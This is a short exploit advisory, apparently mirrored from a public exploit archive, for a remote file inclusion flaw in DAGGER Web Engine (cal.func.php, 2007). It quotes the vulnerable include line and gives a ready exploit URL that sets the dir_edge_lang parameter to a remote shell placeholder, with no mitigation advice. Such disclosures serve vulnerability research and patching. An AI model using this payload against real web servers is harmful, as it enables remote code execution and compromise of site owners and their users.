DAGGER Web Engine <= 23jan2007 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DAGGER Web Engine <= 23jan2007 Remote File Inclusion Vulnerability
# Published : 2007-06-24
# Author : Katatafish
# Previous Title : Pluxml 0.3.1 Remote Code Execution Exploit
# Next Title : Simple Invoices 2007 05 25 (index.php submit) SQL Injection Exploit

###Dagger-web engine(cal.func.php)Remote File Inclusion###

#download:
http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.
zip

#found by: katatafish (karatatata@hush.com)

#code:  (cal.func.php)
include($dir_edge_lang.'cal_lang.inc.php');

#exploit:
http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]

#Thanks: str0ke

# www.Syue.com [2007-06-24]